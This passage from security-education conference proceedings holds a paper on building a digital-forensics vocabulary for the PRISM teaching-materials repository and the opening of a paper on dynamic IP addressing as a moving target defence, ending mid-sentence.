Quality Outlook at Source Code Level", Journal of Software Engineering and Applications, vol. 1, no. 1, pp.<br />
88.<br />
Wilkes, J. 1997, "Business Ethics: A <strong>European</strong> Review, Focus: 'Protecting the Public, Securing the Profession:'<br />
Enforcing Ethical Standards among Software Engineers"<br />
75
Building an Improved Taxonomy for IA Education<br />
Resources in PRISM<br />
Vincent Garramone and Daniel Likarish<br />
Regis University, Denver, USA<br />
garra909@regis.edu<br />
dlikaris@regis.edu<br />
Abstract: To address a perceived lack of availability of educational resources for students and educators in the<br />
field of information assurance, Regis University and the United States Air Force Academy (USAFA) have begun<br />
development of a web portal to store and make available to the public information security-related educational<br />
materials. The portal is named the Public Repository for Information Security Materials (PRISM). In this paper, we<br />
begin with a review of the initial vision for PRISM. We then discuss the development and maintenance of a<br />
deterministic discipline-specific vocabulary, along with the results of mapping curricular content to our initial set of<br />
terms. Out of the eight material descriptions used in our evaluation, five could be clearly mapped to the initial<br />
vocabulary, one could partially be mapped, and three did not contain any clearly mappable terms.<br />
Keywords: PRISM, security education, taxonomy, educational resources<br />
1. Introduction<br />
As more of our lives become increasingly dependent on information technology, educating those who<br />
develop and manage those technologies about information assurance (IA) concepts is crucial to help<br />
reduce the risks of our information being lost, stolen or otherwise compromised. Recent attendance at<br />
national conferences for educators (e.g. ISECON (International Systems Educators <strong>Conference</strong>),<br />
CISSE (Colloquium for Information Systems Security Education) and AMCIS (Americas <strong>Conference</strong><br />
on Information Systems)) provided an opportunity to determine the need for security courses and<br />
materials to support them. The organization and promotion of Security Special Interest Groups<br />
(SecSIG) and increase in the number and variety of security education papers also demonstrates the<br />
increased interest in the field, and the trend has culminated in national recognition that security<br />
education is a national and international concern, (Cooper et al 2010).<br />
Unfortunately, aligning existing educational programs to include a focus on security topics has proven<br />
not to be straightforward. For example, although some institutions report success adding securityspecific<br />
courses to existing curricula, others find this infeasible because of the significant instruction<br />
time and expertise it requires (Null 2004). As an alternative to adding a security-specific course,<br />
relevant lessons can be integrated into existing courses to teach security concepts (Irvine, Chin, and<br />
Frincke 1998). Instructors wishing to add lessons to existing courses must either create or locate<br />
materials that meet their particular curricular needs. Similar to creating and integrating entire courses,<br />
some instructors may not have the time or expertise to develop effective lessons for every topic they<br />
wish to teach. They also recognize the non-uniqueness of lesson materials and see limited utility in<br />
reinvention of materials that they suspect others have developed, (Davis 2010).<br />
To help address these issues and advance the availability of information security education materials,<br />
Regis University and USAFA have initiated a collaborative effort to develop a web portal to store and<br />
make available to the general public information security related educational materials, research,<br />
virtual exercises, and links to security resources. The PRISM web portal will provide an online virtual<br />
space for educators to discuss effective pedagogy, share tools, and collaborate on curriculum<br />
development.<br />
This paper reviews the current vision for the PRISM repository and discusses the development of a<br />
deterministic taxonomy based method of organizing content. The use of deterministic, portal site<br />
analytics is proposed to further improve the forensics content taxonomy and the load process.<br />
2. Vision<br />
The creators of the Public Repository for Information Security Materials (PRISM) web portal intend to<br />
make it a resource for students and educators who are interested in information security education.<br />
Visualization tools, publications, educational materials, links to relevant websites, and research data<br />
are all potential types of material. We envision that individuals, educators and students from K-<br />
Collegiate will contribute to the materials on the site in an ad hoc fashion. The site is a civic commons<br />
76
Vincent Garramone and Daniel Likarish<br />
portal that relies on the goodwill of participants to contribute content. Future versions of the site will<br />
use publication (e.g. blogs, podcasts, articles) to encourage participants to return to the site for<br />
reasons beyond the teaching materials. In addition, the site has the potential to serve as a<br />
collaborative workspace to discuss tools and teaching methods in both synchronous and<br />
asynchronous modes, and to participate in educational games and online activities.<br />
Part of this effort involves determining the most useful way to classify and organize resources<br />
available on the site. Information security is a broad and complex field of study, and one can quickly<br />
become mired in results irrelevant to their interests when conducting keyword searches. Moreover, it<br />
may be difficult to identify terms that will be most useful in locating specific materials within any given<br />
repository (Dicheva and Dichev 2006), especially since many repositories tend to use very general<br />
metadata definitions that lack the specificity required to effectively locate resources (Moisey 2006).<br />
We anticipate an improved method for locating relevant material with carefully crafted taxonomies,<br />
constructed by analyzing vocabulary usage in curricular literature and actual site searches.<br />
3. Background<br />
In early 2010, PRISM was available to the public. For a complete treatment of initial vision,<br />
requirements, and technical execution, see (Garramone and Schweitzer 2010). The web portal was<br />
designed with a high degree of flexibility to allow the project to mold itself to the changing needs of the<br />
community. Ease of use for content seekers and developers, as well as for site moderators and<br />
administrators was given priority when selecting the hardware and software components of PRISM.<br />
An initial set of seven publications and eleven interactive lessons was provided by Dr. Schweitzer and<br />
the US Air Force Academy to showcase the types of resources PRISM was designed to contain. A<br />
handful of materials from other sources were also posted to demonstrate potential content types such<br />
as hyperlink resources and educational simulations. Resources were categorized using a custom set<br />
of vocabularies designed to allow users from heterogeneous backgrounds to access the materials<br />
using familiar terms.<br />
In particular, a subset of the Dublin Core (Weibel et al 2008) provided standard metadata.<br />
Additionally, vocabularies from two prominent IA common bodies of knowledge (CBK) (Theoharidou<br />
and Gritzalis 2007) were implemented to organize resources according to their IA topical content.<br />
Although PRISM is a fully functional repository, several challenges remain. Organizing content based<br />
on static metadata sets proves difficult as usage patterns and industry terminology change.<br />
Furthermore, complex tagging requirements for content makes it difficult for developers to contribute<br />
their content. In their recent IEEE transaction on Learning Technologies, Davis et al. describe the<br />
more general sharing and deposition of education materials by small colleges and university in<br />
common repositories (2010). The failure to develop sustainable material repositories is the result of<br />
poor design decisions, user’s motivation to use them and failure of adoption by communities is related<br />
to difficulty of use, administration and currency of materials.<br />
4. Dynamic taxonomy based content management<br />
Previous attempts to establish education web portals have been less than successful from lack of<br />
participation by resource developers and cumbersome site search strategies to locate interesting<br />
course materials. The upload of resources requires developers to provide metadata descriptors of<br />
their materials based on a fixed taxonomy. Because of the wide variance in resource content, static<br />
taxonomies based on generic structures inherited through the parent portal developer’s best efforts<br />
are not effective. From the resource downloader’s perspective, attempts to retrieve materials are<br />
discouraging because of difficulty in searching for materials described by the same limited taxonomy.<br />
For example, the Merlot educational material repository, the most granular taxonomic term for<br />
information assurance materials is “Security” under the “Information Technology” heading. This<br />
provides no terminology guidance for those submitting or searching for content, and forces users to<br />
resort to keyword searches.<br />
We used the PRISM portal to investigate a simple, deterministic approach to creating a flexible and<br />
stable taxonomic structure that would allow forensics educators to upload resources and search<br />
content in a more easy and useful way. Our approach consisted of generating an initial list of<br />
forensics descriptors that were manually extracted from current forensics literature and ranked<br />
according to what percentage of the documents each term appeared in. The content of a computer<br />
77
Vincent Garramone and Daniel Likarish<br />
forensics course was used to evaluate whether the literature based taxonomy approach would<br />
produce an acceptable description of the material. The result of the evaluation confirmed that a<br />
literature based seeded taxonomy was a good starting point, but that refinement is necessary. The<br />
digital forensics topic was chosen as our initial case because Regis University wanted to make lab<br />
materials from its computer forensics course available on the PRISM site and felt these materials<br />
would be representative of content for a graduate forensics class. The weekly lab materials were<br />
qualitatively evaluated using the list of forensics terms derived from current forensics literature. These<br />
results were then compared to actual terms in the lab topic descriptions given in the course syllabus.<br />
4.1 Granularizing PRISM taxonomies<br />
One of the major goals of PRISM is to make searching for content intuitive and efficient. To achieve<br />
this, content must be tagged in a way that allows keyword and guided searches to return accurate<br />
results. Since IA terminology varies widely among researchers and practitioners, we have tried to<br />
accommodate the broadest possible group of users by developing several taxonomies to tag content.<br />
After a resource has been associated with a particular taxonomy term, it can automatically be<br />
included in guided searches and is reachable with the advanced search function of PRISM. At the<br />
conclusion of the first major development phase, PRISM was equipped with both the International<br />
Information Systems Security Certification Consortium (Theoharidou and Gritzalis 2007) and U.S.<br />
Department of Homeland Security CBK vocabularies (Shoemaker, Drommi, Ingalsbe and Mead<br />
2007). However, in simple use cases existing vocabularies did not offer a sufficient level of specificity.<br />
Rather than create arbitrary lists of terms a researcher might personally want to search for, it was<br />
decided to review the literature and attempt to distill vocabularies that would reflect common usage<br />
among curriculum developers.<br />
The first effort to granularize the PRISM taxonomies was in the area of digital forensics. Digital<br />
forensics is its own discipline within the realm of information security (Berghel 2003). On this basis,<br />
forensics is considered an ideal candidate for a descriptive taxonomy within PRISM. PRISM<br />
researchers analyzed nine recent publications, primarily from curriculum developers, to identify a<br />
common taxonomic structure and current terminology usage. These publications were selected for<br />
their recent contribution and, based on the level of repetition of terms observed, were considered<br />
adequate in number and scope to generate an initial forensics vocabulary for PRISM. The digital<br />
forensics vocabulary currently being used in PRISM contains the most commonly observed digital<br />
forensics terms from these nine papers, and will explicitly specify relationships between synonyms as<br />
they are identified through site analytics. Table 1 shows the initial list of terms implemented within<br />
PRISM (See Appendix 1 for the complete table). To keep the list to a manageable size, only terms<br />
referenced in at least one third of the papers analyzed were included in this initial vocabulary.<br />
Table 1: PRISM’s initial digital forensics vocabulary<br />
Forensics Topics<br />
Reference Count<br />
Legal Process<br />
6<br />
Log Analysis<br />
6<br />
Data Acquisition 5<br />
Data Decryption 5<br />
Deleted Data Recovery 5<br />
Email Forensics 5<br />
Hidden Data Discovery 5<br />
Steganography 5<br />
Documentation 4<br />
Ethics 4<br />
Network Forensics 4<br />
Incident Response 3<br />
Live System Forensics 3<br />
Malware Detection 3<br />
Password Cracking 3<br />
Registry Analysis 3<br />
78
Vincent Garramone and Daniel Likarish<br />
To avoid creating too much predefined structure and possibly over-restricting the way users interact<br />
with the site, a single, flat vocabulary of forensics-related terms was defined, as opposed to a<br />
hierarchical one. This allows accommodation of user variance between how they define and use<br />
terms. Furthermore, terms that refer to conceptual subsets of other terms are included in the<br />
vocabulary because they are apparently often used independently of their parent terms in the<br />
literature. For example, “Steganography” could be conceptually categorized as “hidden data<br />
discovery”, but more than half of the papers examined explicitly mentioned the former term. This is an<br />
example of a deterministic approach: allowing actual usage or terms to dictate taxonomy<br />
development.<br />
4.2 Dealing with added complexity<br />
As the taxonomy structure becomes more complex, a tradeoff between the ease of content searching<br />
and the difficulty of content submission is made. To offset the effects of PRISM’s more complex<br />
taxonomy system, PRISM moderators will categorize content for developers. By offering this service,<br />
content submission difficulty will be reduced, requiring only the submission of a link or the upload of<br />
an archive to be posted.<br />
4.3 A trial of the system<br />
We used Regis University’s Computer Forensics course to evaluate the list of terms derived from the<br />
literature (Table 1) and their ability to describe the computer forensics materials. The premise of the<br />
course is to introduce the student to a wide variety of methods for investigating computer security<br />
incidents. Each student takes on the role of a forensic analyst and each week the student is asked to<br />
apply their skills to the analysis of many different types of data with different scenarios and tools. The<br />
students have to create log entries detailing their findings as they work through the process of<br />
analyzing the data for each scenario. First, we chose terms from the vocabulary that we felt<br />
represented the lab content and learning intent. These lists, given in Table 2, column 2, represent the<br />
values a content creator would assign to their own materials upon upload to the PRISM site. Next<br />
those terms were compared with actual language used to describe the lab content in the course<br />
syllabus, and a rating was given to the level of similarity between the available vocabulary terms and<br />
those explicitly listed in the lab topic descriptions. A “Yes” value suggests that the terminology was<br />
sufficiently similar to allow someone not familiar with the content of the lab to effectively classify data<br />
using only a brief description. A “Partial” value means that one or more, but not all of the vocabulary<br />
terms are reflected in the lab topic description. In this case, a material might not be classified under all<br />
relevant terms, making it difficult to locate on the site. As an example, the lab described in the first row<br />
of Table 2 might only be classified as an “Email Forensics” material since “Documentation” and “Legal<br />
Process” are not explicitly mentioned in the description. Finally, a “No” designation is given if none of<br />
the relevant vocabulary terms are present in the lab topic description.<br />
Table 2: Summary of the weekly lab topics MSIA 680 Computer Forensics course and related PRISM<br />
forensics vocabulary terms<br />
Lab Topics from Syllabus Related PRISM Forensics Terms Match<br />
Email Forensics and the Forensic Template. Also<br />
Email Forensics<br />
Partial<br />
write a preface justifying the forensic approach.<br />
Documentation<br />
Legal Process<br />
Snort alert data and Wireshark packet capture<br />
Network Forensics<br />
No<br />
Network Security Podcast Report<br />
Log Analysis<br />
Live Response, Volatile & Nonvolatile Data, Cache<br />
Dump<br />
Live System Forensics Yes<br />
RAPIER Tool Analysis. End with analysis of the<br />
Log Analysis<br />
No<br />
Strength and Weakness of Forensic Tools and<br />
Hidden Data Discovery<br />
Processes<br />
Documentation<br />
Tool Validation*<br />
Registry Examination and Tool usage Registry Analysis Yes<br />
File Analysis Lab Hidden Data Discovery No<br />
Active Malware Discovery (Trojans) and Memory<br />
Examination<br />
Rootkit Examination and research of additional<br />
risks and methods of detection<br />
79<br />
Malware Detection<br />
Hidden Data Discovery<br />
Malware Detection<br />
Yes<br />
Yes
Vincent Garramone and Daniel Likarish<br />
Note: A positive in the Match column indicates that the seeded taxonomy terms were closely or<br />
exactly reflected in the Regis lab topic.<br />
This rudimentary analysis demonstrated that seeding the forensics vocabulary with terms extracted<br />
from a public literature search might be sufficient to allow a moderator to characterize the uploaded<br />
material without intimate knowledge of its contents. See Appendix 2 for a visual representation of this<br />
mapping in table form for the course MSIA 682, Network Forensics. It is clear, however, that the initial<br />
vocabulary could benefit from adjustments. For example, the lab description in row 2 of Table 2<br />
mentions, “packet capture”. While this is not in the initial vocabulary, it is closely related to “Network<br />
Forensics” and “Packet Analysis”. Network Forensics was included in the initial list and Packet<br />
Analysis, while identified in the literature, was not for reasons described above. To address this, it<br />
might be appropriate to replace “Network Forensics” with “Packet Analysis” in the PRISM vocabulary.<br />
Alternatively, defining the relationship of these terms in PRISM (synonyms, subtopics, etc.) might<br />
create a more inclusive and useful search environment.<br />
4.4 Honing the vocabulary<br />
The artifact constructed through literature review is, as mentioned, a starting point in the development<br />
of an optimized digital forensics vocabulary for PRISM. It remains to be seen if these terms resonate<br />
with other users of the web portal or if different descriptors will be favored. Moreover, terminology<br />
changes over time, and PRISM’s vocabularies should be able to accommodate those changes. The<br />
authors plan to utilize new content and analytics data to identify discrepancies between the<br />
vocabulary defined above, and actual topics and terms utilized by PRISM users. PRISM records all<br />
searches performed on the site and generates reports listing common phrases. Searches are also<br />
tracked by Google Analytics, which provides a more in-depth view of searches executed on the site,<br />
as well as visitor behavior before and after the search. After a particular search is executed, Google<br />
services can be used to determine user’s preferred or selected materials. This capability can provide<br />
insight into how accurate and relevant the taxonomies are at any given time. As long as usage of the<br />
site continues, these tools will help PRISM moderators to maintain relevant IA vocabularies from<br />
which content can be described.<br />
5. Conclusions<br />
IA is a rapidly changing field, and maintaining relevance is a difficult task. We are attempting to keep<br />
PRISM responsive to changes in the IA landscape. PRISM developers will continue to make<br />
adjustments based on the needs of the user community by allowing current literature and actual<br />
usage statistics to guide the development of organizational taxonomies. Explicitly attaching these<br />
relevant descriptors to site content allows administrators to produce intuitive, guided search<br />
functionalities, making it easier for users to locate the materials they need. Results using our own<br />
materials as a test case suggest that taxonomies constructed in this way could be effective for other<br />
users. A more rigorous evaluation will only be possible if site utilization increases and is sustained<br />
over a significant period of time. To this end, PRISM moderators recognize, and are prepared to<br />
absorb, the increased work required to properly organize content on the site as taxonomic complexity<br />
increases. This will hopefully make using the site more attractive to content developers and, in turn, to<br />
those seeking educational resources.<br />
6. Appendix 1: Terminology usage matrix<br />
Forensics Topics Totals<br />
Legal Process [1] [3] [5] [6] [11] [12] 6<br />
Log Analysis [1] [3] [5] [6] [11] [13] 6<br />
Data Acquisition [1] [2] [3] [12] [13] 5<br />
Data Decryption [1] [2] [5] [11] [12] 5<br />
Deleted Data Recovery [1] [3] [6] [11] [12] 5<br />
Email Forensics [2] [3] [5] [6] [13] 5<br />
Hidden Data Discovery [1] [2] [3] [11] [12] 5<br />
Steganography [1] [5] [11] [12] [13] 5<br />
Documentation [1] [2] [5] [13] 4<br />
Ethics [6] [11] [12] [13] 4<br />
80
Vincent Garramone and Daniel Likarish<br />
Forensics Topics Totals<br />
Network Forensics [3] [6] [11] [13] 4<br />
Incident Response [11] [12] [15] 3<br />
Live System Forensics [1] [3] [15] 3<br />
Malware Detection [3] [11] [12] 3<br />
Password Cracking [2] [5] [13] 3<br />
Registry Analysis [3] [6] [13] 3<br />
Hardware Identification [2] [6] 2<br />
Tool Development [3] [11] 2<br />
Web Browser Forensics [6] [13] 2<br />
Baselining [3] 1<br />
Application Analysis [6] 1<br />
Data Reconstruction [6] 1<br />
Forensic Planning 1<br />
Key Loggers [3] 1<br />
Dead System Forensics [15] 1<br />
Packet Analysis [6] 1<br />
Password Auditing [3] 1<br />
RFID Forensics [6] 1<br />
Tool Validation [11] 1<br />
Web Services [6] 1<br />
Evidence Collection and Handling [5] 1<br />
Key Authors Year Country Subject<br />
[1] Bem, D. and Huebner, E. 2008 Australia Curriculum<br />
[2] Berghel, H. 2003 USA Definition<br />
[3] Crowley, E. 2007 USA Curriculum (corporate)<br />
[5] Figg, W. and Zhou, Z. 2007 USA Curriculum<br />
[6] Francia, G. A. 2006 USA Curriculum<br />
[11] Troell, L., Pan, Y., and Stackpole, B. 2003 USA Curriculum<br />
[12] Troell, L., Pan, Y., and Stackpole, B. 2004 USA Curriculum<br />
[13] Wassenaar, D., Woo, D., and Wu, P. 2009 USA Curriculum<br />
[15] Yen, P., Yang, C., and Ahn, T. 2009 Taiwan Process<br />
7. Appendix 2: MSIA 682, Network Forensics course topics and activities<br />
mapped to PRISM forensics vocabulary<br />
Course Topic Activity Description<br />
Introduction to Security<br />
Monitoring<br />
Intro Security packet data<br />
structure based on the<br />
TCP/IP model<br />
81<br />
Example of a granular<br />
Lab Activity<br />
Identify the following<br />
packet structures by<br />
explaining what each<br />
packet is, what ports,<br />
protocols or codes<br />
each one uses using<br />
the static packet<br />
captures<br />
PRISM Forensics<br />
vocabulary<br />
Network forensics
Vincent Garramone and Daniel Likarish<br />
Course Topic Activity Description<br />
Protocol Analysis After understanding packet<br />
data structures. Examine<br />
different types of network<br />
services using standard<br />
sniffing tools<br />
Metadata and Statistical<br />
Analysis<br />
Session Data, Intrusion<br />
Detection and Alert Data<br />
Normal, Suspicious and<br />
Malicious Traffic<br />
References<br />
Decompose packets for<br />
the content: metadata and<br />
other attributes using<br />
packet capture files<br />
Investigate layer three and<br />
four session data using the<br />
Network Security<br />
Management Framework<br />
Examples of normal,<br />
suspicious and malicious<br />
traffic based on pcap files<br />
Example of a granular<br />
Lab Activity<br />
Explain the following<br />
tcpdump flags: -v, -n, -<br />
i, -r, -w, -e, -t, -x, -X, -<br />
s, -D, -q, -L, identity<br />
which flags that can<br />
be used more than<br />
once? Please use<br />
7.pcap file for this<br />
exercise.<br />
Examine the files<br />
1.pcap through 6.pcap<br />
using either Netdude<br />
or Wireshark<br />
explaining what<br />
protocols are in use,<br />
whether they use UDP<br />
or TCP and what ports<br />
are used for each<br />
protocol.<br />
Please review the<br />
nfsen video to review<br />
the capabilities of<br />
nfsen (a web front<br />
end) and nfdump, the<br />
netflow<br />
collector/provider<br />
Please examine pcap<br />
files 1-7 and identify<br />
the type of traffic and<br />
whether or not it would<br />
be normal, suspicious<br />
or malicious.<br />
PRISM Forensics<br />
vocabulary<br />
Network Forensics, Live<br />
Systems Forensics<br />
Log Analysis, Hidden<br />
Data Discovery<br />
Log Analysis, Hidden<br />
Data Discovery<br />
Malware Detection, Live<br />
Systems Forensics,<br />
Hidden Data Discovery<br />
Bem, D. and Huebner, E. (2008) “Computer forensics workshop for undergraduate students”, In Proceedings of<br />
the tenth conference on Australasian computing education, Vol. 78, Simon Hamilton and Margaret Hamilton<br />
(Eds.), Australian Computer Society, Inc., Darlinghurst, Australia, pp 29-33.<br />
Berghel, H. (2003) “The discipline of Internet forensics”, Communications of the ACM, Vol. 46, No. 8, pp 15-20.<br />
DOI= http://doi.acm.org/10.1145/859670.859687<br />
Cooper, S., Nickell, C., Piotrowski, V., Oldfield, B., Abdallah, A., Bishop, M., Caelli, B., Dark, M., Hawthorne, E.,<br />
Hoffman, L., Perez, L., Pfleeger, C., Raines, R., Schou, C., and Brynielsson, J. (2010) “An exploration of the<br />
current state of information assurance education”, SIGCSE Bull, Vol. 41, No. 4, pp 109-125.<br />
DOI=10.1145/1709424.1709457<br />
Crowley, E. (2007) “Corporate forensics class design with open source tools and live CDS”, J. Comput. Small<br />
Coll. Vol. 22, No. 4, pp 170-176.<br />
Davis, H., Carr, L., Hey, J., Howard, Y., Millard, D., Morris, D., and White, S. (2010) “Bootstrapping a culture of<br />
sharing to facilitate open educational resources”, IEEE Transactions on Learning Technologies, Vol. 3, No.<br />
2, pp 96-109.<br />
Dicheva, D. and Dichev, C. (2006) “Tm4l: creating and browsing educational topic maps”, British Journal of<br />
Educational Technology, Vol. 37, No. 3, pp 391-404.<br />
Figg, W. and Zhou, Z. (2007) “A computer forensics minor curriculum proposal”, J. Comput. Small Coll, Vol. 22,<br />
No. 4, pp 32-38.<br />
Francia, G. A. (2006) “Digital forensics laboratory projects”, J. Comput. Small Coll, Vol. 21, No. 5, pp 38-44.<br />
Garramone, V. and Schweitzer, D. (2010) “PRISM: A public repository for information security material”, In<br />
Proceedings from the 14th Annual Colloquium for Information Systems Security Education, Baltimore, MD.<br />
Irvine, C., Chin, S., and Frincke, D. (1998) “Integrating security into the curriculum”, Computer, Vol. 31, No. 12,<br />
pp 25-30.<br />
Moisey, S. Alley, M. & Spencer, B. (2006) “Factors affecting the development and use of learning objects”, The<br />
American Journal of Distance Education, Vol. 20, No. 3, pp 143-161.<br />
Null, L. (2004) “Integrating security across the computer science curriculum”, Journal of Computing Sciences in<br />
Colleges, Vol. 19, No. 5, pp 170-178.<br />
Peisert, S., Bishop, M., and Marzullo, K. (2008) “Computer forensics in forensics”, SIGOPS Oper. Syst. Rev., Vol.<br />
42, No. 3, pp 112-122. DOI= http://doi.acm.org/10.1145/1368506.1368521<br />
82
Vincent Garramone and Daniel Likarish<br />
Schweitzer, D. and Boleng, J. (2009) “Designing web labs for teaching security concepts”, J. Comput. Small Coll.,<br />
Vol. 25, No. 2, pp 39-45.<br />
Shoemaker, D., Drommi, A., Ingalsbe, J.A., and Mead, N.R. (2007) “A comparison of the software assurance<br />
common body of knowledge to common curricular standards”, Software Engineering Education & Training,<br />
2007, pp 149-156.<br />
Theoharidou, M. and Gritzalis, D. (2007) “Common body of knowledge for information security”, Security &<br />
Privacy, IEEE, Vol. 5, No. 2, pp 64-67. DOI=10.1109/MSP.2007.32<br />
Troell, L., Pan, Y., and Stackpole, B. (2003) “Forensic course development”, In Proceedings of the 4th<br />
<strong>Conference</strong> on information Technology Curriculum, 16-18 October, ACM, New York, NY, pp 265-269.<br />
DOI=http://doi.acm.org/10.1145/947121.947180<br />
Troell, L., Pan, Y., and Stackpole, B. (2004) “Forensic course development: one year later”, In Proceedings of the<br />
5th <strong>Conference</strong> on information Technology Education, 28-30 October, ACM, New York, NY, pp 50-55.<br />
DOI=http://doi.acm.org/10.1145/1029533.1029547<br />
Wassenaar, D., Woo, D., and Wu, P. (2009) “A certificate program in computer forensics”, J. Comput. Small Coll.,<br />
Vol. 24, No. 4, pp 158-167.<br />
Weibel, S., Kunze, J., Lagoze, C. and Wolf, M. (1998) “Dublin Core Metadata for Resource Discovery”, RFC<br />
Editor. US<br />
Yen, P., Yang, C., and Ahn, T. (2009) “Design and implementation of a live-analysis digital forensic system”, In<br />
Proceedings of the 2009 international <strong>Conference</strong> on Hybrid information Technology, 27-29 August, Vol.<br />
321, ACM, New York, NY, pp 239-243. DOI=http://doi.acm.org/10.1145/1644993.1645038<br />
83
Using Dynamic Addressing for a Moving Target Defense<br />
Stephen Groat, Matthew Dunlop, Randy Marchany and Joseph Tront<br />
Virginia Polytechnic Institute and State University, Blacksburg, USA<br />
sgroat@vt.edu<br />
dunlop@vt.edu<br />
marchany@vt.edu<br />
jgtront@vt.edu<br />
Abstract: Static network addressing allows for attackers to geographically track hosts and launch network<br />
attacks. While technologies such as DHCP claim dynamic addressing, the majority of network addresses<br />
currently deployed are static for at least a session. Dynamic addresses, changing multiple times within a session,<br />
disassociate a user with a static address. This disassociation is important since a static address can be used to<br />
identify a host and makes targeting the host for attack feasible. We propose using dynamic addressing, in which<br />
hosts’ addresses change multiple times per session, to create a moving target defense. Analyzing the primary<br />
factors which contribute to the security of dynamic addressing, we statistically evaluate the validity of this<br />
technique as a network defense. We then identify the optimal characteristics of a network-layer moving target<br />
defense that uses dynamic addressing.<br />
Keywords: moving target defense, network address security, privacy, dynamic addressing<br />
1. Introduction<br />
As computers and networks become embedded in critical services throughout society, the privacy and<br />
security implications of fixed network addresses expose users to tracking and attack. Specifically, at<br />
the link layer, Media Access Control (MAC) addresses associated with a network interface are<br />
susceptible to flooding and spoofing attacks. At the network layer, Internet Protocol (IP) addresses<br />
are susceptible to spoofing, tracking, and targeting. Both the MAC and IP addresses of servers and<br />
other host machines are usually static to allow for clients to successfully communicate. These static<br />
addresses often leave servers vulnerable to attack because these fixed addresses are easy targets to<br />
locate. If the host is compromised, an attacker can create a denial of service (DoS) attack on the<br />
server which affects all attached clients. Another concern is mobile hosts whose non-changing<br />
network addresses can be geotemporally tracked, compromising user's privacy.<br />
We explore the variables that impact how effectively dynamic IP addressing protects hosts and the<br />
impact these variables have on each other. One variable is the number of dynamic bits in the<br />
address, or bits available to change. The fewer dynamic bits, the more likely an attacker can use brute<br />
force techniques to correlate addresses. Another variable is the frequency of the address change. An<br />
address with fewer dynamic bits needs to change more often to avoid identification. No temporary<br />
address can remain static for too long without risking data correlation. A third variable to consider is<br />
the population density of the address space or subnet. A sparsely populated subnet would make<br />
address identification easier for the attacker since fewer addresses are in use. Alternatively, a densely<br />
populated subnet would make address identification considerably more challenging due to the<br />
additional hosts creating traffic on the network. Although it is easy to simply maximize all the<br />
variables, computational overhead prevents this. Minimizing computational expense is particularly<br />
important for power-constrained devices.<br />
To combat the security and privacy concerns of non-changing addressing, we analyze how dynamic<br />
network addressing would increase security, privacy, and reliability. Dynamic addressing refers to<br />
addresses in which some or all of the address non-deterministically changes, possibly even midsession.<br />
Dynamic addressing prevents would-be attackers from tracking users over time and as they<br />
move through different networks, because the changing addresses cannot be correlated to a single<br />
user. Dynamic addressing also protects against traffic correlation by network sniffing attacks because<br />
of the difficulty of associating a user with a changing address. Dynamic addressing provides<br />
additional security by creating a moving target defense at the network layer that prevents attackers<br />
from targeting specific machines. The increased security offered by dynamic network addressing<br />
protects privacy and data for network users.<br />
To analyze the use of dynamic addresses in creating a moving target defense, the remainder of the<br />
paper is organized as follows. Static addresses and their associated security risks are discussed in<br />
Section 2. Related work is surveyed in Section 3, focused on analyzing the need for address privacy.<br />
84
Stephen Groat et al.<br />
Sections 4 and 5 analyze the different factors which affect the security of a dynamic address and how<br />
these factors affect each other. Section 6 uses statistical simulation results to validate our security<br />
analysis of dynamic addressing factors. In Section 7, we discuss specific security advantages offered<br />
by dynamic addresses. Future work planned to demonstrate a dynamic addressing approach is<br />
discussed in Section 8 and we conclude in Section 9.<br />
2. Problem<br />
Static addresses are necessary to allow users to repeatedly find resources. Without providing a<br />
notification of an address change, users must have a single, static identifier to locate resources. For<br />
example, IP addresses, whether static or dynamic, are often connected with Domain Name System<br />
(DNS) names. DNS names are updated with the current IP address to facilitate location of resources<br />
on the Internet with an easily recognizable value. Without a static value connected to networked<br />
resources, whether DNS names or IP addresses, users would be unable to find the resources. Even<br />
Dynamic Host Configuration Protocol (DHCP) leased addresses, which are widely assumed to be<br />
dynamic, rarely change.<br />
While static addressing is critical to assist users in finding resources, static addresses allow malicious<br />
users to easily locate targets for attack. For example, DNS names and IP addresses are publically<br />
available static addresses. These vectors allow attackers to easily conduct scans to locate target<br />
hosts. Once a target is located, the attacker can focus on the target found and assume that the<br />
target’s static identifier will not change. An attacker is able to make this assumption since identifier<br />
changes would interrupt service for valid users. To ensure the reliability and security of service, critical<br />
services must deploy some sort of moving target defense that changes static identifiers while allowing<br />
continuity of service for trusted users.<br />
3. Related work<br />
The need for an anonymous network address to maintain security and privacy has been explored.<br />
Reiter and Rubin (1999) developed a scheme, called Crowds, to maintain IP address anonymity from<br />
web sites. The protocol uses other computers surfing the web to funnel web requests through. The<br />
effect is to create a crowd of users browsing web servers to hide web requests. Johnson et al. (2007)<br />
identified the need to anonymize addresses and built a trust model into Tor networks called Nymble.<br />
Nymble hides clients' IP addresses from servers. Shields et al. (2000) created another anonymity<br />
protocol named Hordes. Hordes’ focus is on creating a secure system that does not decrease network<br />
performance. All of these approaches focus on hiding the publicly available addresses by using<br />
complex support networks. We analyze the vectors that static address create for tracking and attack<br />
and recommend anonymizing the host address, which none of these three protocols addresses.<br />
Koukis et al. (2006) uses web site signatures and fingerprinting to determine host addresses in<br />
anonymized IP logs. This method is ineffective for tracking dynamic hosts, further demonstrating the<br />
potential security and privacy advantages of dynamic addresses.<br />
A number of researchers have focused on the potential dangers resulting from network address<br />
tracking in the Internet Protocol version 6 (IPv6). Dunlop et al. (2011) identified the dangers posed by<br />
auto-configured addresses in IPv6 and presented a taxonomy of methods to obscure addresses.<br />
Narten, Draves, and Krishnan (2007) also identified a privacy concern with IPv6 addresses and<br />
proposed a potential solution called privacy extensions. Privacy extensions can create new addresses<br />
for users each time they connect to a subnet. Bagnulo and Arkko (2006) also proposed a solution<br />
aimed at protecting IPv6 addresses. Their approach, called Cryptographically Generated Addresses<br />
(CGAs), uses a self-generated public key to obscure an address for each subnet. Neither privacy<br />
extensions nor CGAs dynamically obscure addresses and addresses remain the same until the user<br />
terminates the session. Even though the addresses are obscured, they typically remain static long<br />
enough for a malicious third party to gather information about the user.<br />
While we have discovered no other academic work considering the security and privacy effects of<br />
addressing, two patents attempt to utilize dynamic addressing for security. A technique by Sheymov<br />
(2010) is designed with the goal of dynamic obscuration. Sheymov's objective behind dynamic<br />
obscuration is to provide intrusion protection from certain classes of network attacks. While<br />
Sheymov’s method uses dynamic addressing, it relies on an Intrusion Detection System to trigger<br />
address changes. We analyze consistent dynamic address changes that require no additional<br />
systems to support. Fink et al. (2006) also propose a technique for dynamically obscuring host<br />
addresses called Adaptive Self-Synchronized Dynamic Address Translation (ASD). ASD uses<br />
85
Stephen Groat et al.<br />
symmetric keys established through a handshake process between a trusted sender and receiver<br />
enclave. This technique adds additional overhead due to repetition of the handshake process. A<br />
